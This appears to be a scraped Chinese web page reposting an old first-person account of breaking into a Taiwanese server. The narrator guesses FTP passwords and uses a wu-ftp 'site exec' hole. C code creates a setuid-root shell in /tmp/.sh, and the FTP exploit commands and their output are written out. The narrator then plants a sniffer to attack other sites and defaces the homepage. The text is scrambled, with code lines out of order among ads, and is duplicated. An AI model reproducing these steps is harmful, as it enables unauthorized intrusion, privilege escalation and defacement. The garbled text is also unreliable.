一次入侵全过程
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
一次入侵全过程
回首页网上教学安全教程工具下载电子商务免费资源网络导航飞越新闻
一次入侵全过程
一次入侵全过程
一次去黑台湾佬的网站,先用HAKTEK扫了一下PORT,发现这个网站开的端口蛮多的,像TELNET,FTP,FINGER都开了,这样成功的可能性就大一些了。于是打开浏览器看看它的主页,最后有一个联系人EMAIL:support@xxx.xxx.xxx。FTP过去,帐号用support,密码也用support,失败!密码用support123,失败!密码用support1234,又失败!……总之是失败了N次,最后被我用sup做密码试成功进入了。进入后敲gcc看一下,能够用C编译器,这时已经成功了60%。此系统版本为SUNOS5.5.1,很普通嘛。于是我急急忙忙去各个黑站找exploits,没想到这个系统的exploits这么少,好几天后我才在一个黑客站点找到了三个exploits,急忙把exploits上传,最令我恼火的是好不容易找到的exploits居然没法编译成功,三个exploits编译时都显示出错!由于那三个C程序里都有一串UNIX机器码,我也看不懂是错在哪里。只好想别的办法了,telnet
system("cp /bin/sh /tmp/.sh");
system("chmod 6777 /tmp/.sh");
system("chown root /tmp/.sh");
system("chmod 4755 /tmp/.sh");
localhost 25看一下,我本希望出现sendmail
x.x的提示信息,没想到出现了一大堆奇怪的信息,看来这个管理员很狡猾,修改了提示信息,故意让人看不出sendmail的版本。我再一次FTP过去,发现它的FTPD居然是wu-ftp
2.x,这么大的漏洞当然要试一下了。wu-ftp 2.x的漏洞是最容易成功的了,先编译一个C程序 wu.c :
国产软件解密痴心赚钱网红豆居中国信托研究
考虑到借助它攻击其他网站,再安装SNIFFER,不要被网管发现才好。
最后修改他的主页,这也不算破坏,开个玩笑嘛!
打扫战场,bye!
作者:righthand 8848网站资助个人网站,一次点击支付0.20元人民币
system("chmod +s /tmp/.sh");
}
这个程序很短,编译时没有出错。然后chmod a+x wu.
FTP过去,用这个命令检验是否可以利用此漏洞,
quote "site exec bash -c id"
ISME广告链[统计]
低成本高效推广您的网站--ISME为您提供让您心动的网上推广解决方案!
亚桥帮你网上安家★恋爱宝典★我爱聊天网经济万象
绿浪足球网足球大本营★OICQ在线〓非常新奇★时空网
200-bash -c id
200-uid=0(root) gid=0(root) euid=101(funky) egid=50(users)
groups=50(users)
200 (end of 'bash -c id') (一但出现 euid=0 就成功了!)
然后执行
quote "site exec bash -c /export/home/myname/wu"
现在再用TELNET进入,执行 /tmp/.sh
哈哈哈哈!终于看到了盼望已久的#提示符,已经成为root啦!
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main()
{
seteuid(0);
回首页网上教学安全教程工具下载电子商务免费资源网络导航飞越新闻
一次入侵全过程
一次入侵全过程
一次去黑台湾佬的网站,先用HAKTEK扫了一下PORT,发现这个网站开的端口蛮多的,像TELNET,FTP,FINGER都开了,这样成功的可能性就大一些了。于是打开浏览器看看它的主页,最后有一个联系人EMAIL:support@xxx.xxx.xxx。FTP过去,帐号用support,密码也用support,失败!密码用support123,失败!密码用support1234,又失败!……总之是失败了N次,最后被我用sup做密码试成功进入了。进入后敲gcc看一下,能够用C编译器,这时已经成功了60%。此系统版本为SUNOS5.5.1,很普通嘛。于是我急急忙忙去各个黑站找exploits,没想到这个系统的exploits这么少,好几天后我才在一个黑客站点找到了三个exploits,急忙把exploits上传,最令我恼火的是好不容易找到的exploits居然没法编译成功,三个exploits编译时都显示出错!由于那三个C程序里都有一串UNIX机器码,我也看不懂是错在哪里。只好想别的办法了,telnet
system("cp /bin/sh /tmp/.sh");
system("chmod 6777 /tmp/.sh");
system("chown root /tmp/.sh");
system("chmod 4755 /tmp/.sh");
localhost 25看一下,我本希望出现sendmail
x.x的提示信息,没想到出现了一大堆奇怪的信息,看来这个管理员很狡猾,修改了提示信息,故意让人看不出sendmail的版本。我再一次FTP过去,发现它的FTPD居然是wu-ftp
2.x,这么大的漏洞当然要试一下了。wu-ftp 2.x的漏洞是最容易成功的了,先编译一个C程序 wu.c :
国产软件解密痴心赚钱网红豆居中国信托研究
考虑到借助它攻击其他网站,再安装SNIFFER,不要被网管发现才好。
最后修改他的主页,这也不算破坏,开个玩笑嘛!
打扫战场,bye!
作者:righthand 8848网站资助个人网站,一次点击支付0.20元人民币
system("chmod +s /tmp/.sh");
}
这个程序很短,编译时没有出错。然后chmod a+x wu.
FTP过去,用这个命令检验是否可以利用此漏洞,
quote "site exec bash -c id"
ISME广告链[统计]
低成本高效推广您的网站--ISME为您提供让您心动的网上推广解决方案!
亚桥帮你网上安家★恋爱宝典★我爱聊天网经济万象
绿浪足球网足球大本营★OICQ在线〓非常新奇★时空网
200-bash -c id
200-uid=0(root) gid=0(root) euid=101(funky) egid=50(users)
groups=50(users)
200 (end of 'bash -c id') (一但出现 euid=0 就成功了!)
然后执行
quote "site exec bash -c /export/home/myname/wu"
现在再用TELNET进入,执行 /tmp/.sh
哈哈哈哈!终于看到了盼望已久的#提示符,已经成为root啦!
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main()
{
seteuid(0);